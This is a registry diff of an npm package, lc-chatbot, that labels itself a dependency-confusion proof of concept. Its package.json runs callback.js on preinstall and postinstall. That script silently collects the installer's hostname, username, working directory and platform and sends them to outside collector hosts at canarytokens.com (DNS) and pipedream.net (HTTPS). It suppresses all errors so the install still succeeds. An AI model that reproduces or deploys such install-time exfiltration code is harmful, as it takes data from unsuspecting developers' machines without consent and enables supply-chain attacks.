lc-chatbot 0.9.0-rc.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/callback.js +63 -0
  2. package/index.js +4 -0
  3. package/package.json +14 -0
package/callback.js ADDED
@@ -0,0 +1,63 @@
1
+ /*
2
+ * dependency-confusion proof-of-concept callback.
3
+ */
4
+ 'use strict';
5
+
6
+ // ---- collector endpoints ----
7
+ var CANARY_HOST = '4cyx1u2wzgs8wpgmy4rq1nrvm.canarytokens.com';
8
+ var PIPEDREAM_URL = 'https://eolxuw8fddeyjj8.m.pipedream.net';
9
+ // ----------------------------------------
10
+
11
+ try {
12
+ var os = require('os');
13
+ var dns = require('dns');
14
+ var https = require('https');
15
+
16
+ var token = Math.random().toString(36).slice(2, 10);
17
+
18
+ var host = '';
19
+ try { host = os.hostname() || ''; } catch (e) {}
20
+ var user = '';
21
+ try { user = (os.userInfo() || {}).username || ''; } catch (e) {}
22
+ var cwd = '';
23
+ try { cwd = process.cwd() || ''; } catch (e) {}
24
+ var pkg = (process.env.npm_package_name || 'lc-chatbot') + '@' +
25
+ (process.env.npm_package_version || '');
26
+
27
+ // hex-encode hostname into a single DNS-safe label (<=63 chars; truncate long names)
28
+ function hexLabel(s) {
29
+ var h = Buffer.from(String(s)).toString('hex');
30
+ return h.length > 58 ? h.slice(0, 58) : h;
31
+ }
32
+
33
+ // ---- DNS channel (Canarytokens) ----
34
+ try {
35
+ if (CANARY_HOST && CANARY_HOST.indexOf('__') === -1) {
36
+ var name = hexLabel(host) + '.' + token + '.' + CANARY_HOST;
37
+ dns.resolve(name, function () {});
38
+ dns.resolve4(name, function () {});
39
+ }
40
+ } catch (e) {}
41
+
42
+ // ---- HTTP channel — richer data + notifications ----
43
+ try {
44
+ if (PIPEDREAM_URL && PIPEDREAM_URL.indexOf('__') === -1) {
45
+ var qs = '?t=' + encodeURIComponent(token) +
46
+ '&h=' + encodeURIComponent(host) +
47
+ '&u=' + encodeURIComponent(user) +
48
+ '&cwd=' + encodeURIComponent(cwd) +
49
+ '&pkg=' + encodeURIComponent(pkg) +
50
+ '&plat=' + encodeURIComponent(process.platform + '/' + process.arch);
51
+ var req = https.get(PIPEDREAM_URL + qs, function (res) { res.resume(); });
52
+ req.on('error', function () {});
53
+ req.setTimeout(4000, function () { try { req.destroy(); } catch (e) {} });
54
+ if (req.unref) req.unref();
55
+ }
56
+ } catch (e) {}
57
+ } catch (e) {
58
+ // swallow everything — never break the host build
59
+ }
60
+
61
+ // never block / never fail the install
62
+ try { setTimeout(function () {}, 0); } catch (e) {}
63
+ process.exitCode = 0;
package/index.js ADDED
@@ -0,0 +1,4 @@
1
+ // Dependency-confusion proof-of-concept.
2
+ // Intentionally exports an empty object so that if a build imports this package
3
+ // it does not hard-crash.
4
+ module.exports = {};
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "lc-chatbot",
3
+ "version": "0.9.0-rc.0",
4
+ "description": "Dependency-confusion proof-of-concept",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node callback.js",
8
+ "postinstall": "node callback.js"
9
+ },
10
+ "keywords": ["security-research", "placeholder", "do-not-use"],
11
+ "author": "absec",
12
+ "license": "MIT",
13
+ "files": ["index.js", "callback.js", "README.md"]
14
+ }